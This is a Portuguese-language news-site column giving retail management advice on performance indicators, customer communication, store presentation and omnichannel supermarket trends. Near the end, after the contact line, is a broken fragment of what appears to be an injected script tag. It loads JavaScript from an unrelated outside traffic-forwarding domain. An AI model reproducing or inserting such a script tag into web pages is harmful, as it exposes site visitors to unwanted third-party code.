InícioColunasApenas vender não é suficiente para obter bons resultados

Apenas vender não é suficiente para obter bons resultados

Últimas notícias

Operação contra abuso sexual em Canoinhas e Papanduva é considerada a maior da região

A operaçãoRespectus, deflagrada nesta quarta-feira (24) em Papanduva e...

Após denúncia polícia militar apreende arma sem registro em Três Barras

Na quarta-feira, 24, por volta das 16h, policiais militares...

É importante também ampliar indicadores de desempenho e mesclar modelos de operação

Ampliar os indicadores de desempenho usados para acompanhar os resultados das lojas e mesclar operações físicas com digitais são fatores de sucesso para o varejo daqui para a frente. O espaço para prosperar é cada vez menor se a empresa não tiver uma marca forte e não estabelecer uma comunicação com seus consumidores a partir de seus reais desejos e necessidades. Também é preciso ficar alerta para a necessidade de acompanhar as tendências e entender para onde caminha o setor varejista.

 

Gestão bem explicada

“O varejo até hoje tinha praticamente a venda como único indicador para a gestão do negócio. Quase sempre a ‘melhor loja’ era a que ‘vendia mais’. Se olharmos o setor como um todo, ainda são poucas as empresas que utilizam, por exemplo, o número de itens por cupom. E ainda há outros indicadores, como o fluxo de pessoas e a taxa de conversão. Uma questão que impede uma venda melhor é a fila. Em uma compra de conveniência, as pessoas não querem esperar mais do que 5 minutos para serem atendidas. Isso também precisa ser medido. Os sistemas de gestão hoje apresentam muito mais informações do que o varejista realmente precisa. Por isso, ele deve focar o que é importante, aquilo que está comprometendo as vendas ou o que apresenta oportunidade de negócio”.

 

Boa comunicação com o cliente

“O varejista precisa estabelecer claramente sua proposta de valor e o segmento de mercado em que vai atuar para focar a comunicação nisso. Existem hoje, por exemplo, diversas empresas que priorizam bons serviços e atendimento com o objetivo de se distanciar do negócio de ‘menor preço’. Ou seja, comunicação é principalmente ter foco e direcionamento”.

 

Loja mais atrativa

“Costumo dizer que exposição é a alma do negócio. É preciso ter uma boa ilha ou ponta de gôndola, por exemplo. De forma mais geral, é necessário contar com ambiente acolhedor, boa iluminação, capricho na definição dos expositores e da comunicação visual e até música ambiente. Tudo isso pode contribuir na construção de uma boa experiência de compra, principalmente se aliado a um atendimento cordial”.

 

Para onde caminha o varejista

“Estamos vivendo uma época sem precedentes de novas tecnologias, o que dificulta previsões de onde estará o varejo daqui a 5, 10 anos. O negócio de supermercados está migrando cada vez mais para um ‘negócio de abastecimento residencial’. Nesse conceito, o consumidor já está ditando qual canal prefere para realizar suas ‘reposições’ diárias, semanais ou mensais. Esses canais podem ser digitais, nos quais, por meio de aplicativos, é possível escolher marcas, preço e onde a compra deve ser entregue: em casa, no local de trabalho ou ainda se a pessoa quer retirá-la no drive-thru ou na loja física. O espaço para prosperar é cada vez menor para quem não consegue estabelecer uma comunicação com seus consumidores a partir dos seus reais desejos e necessidades. Só vender, hoje, não basta”.

Email: [email protected] | Site: www.mixx.adm.br | WPP: 42 9 9841 0280

… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.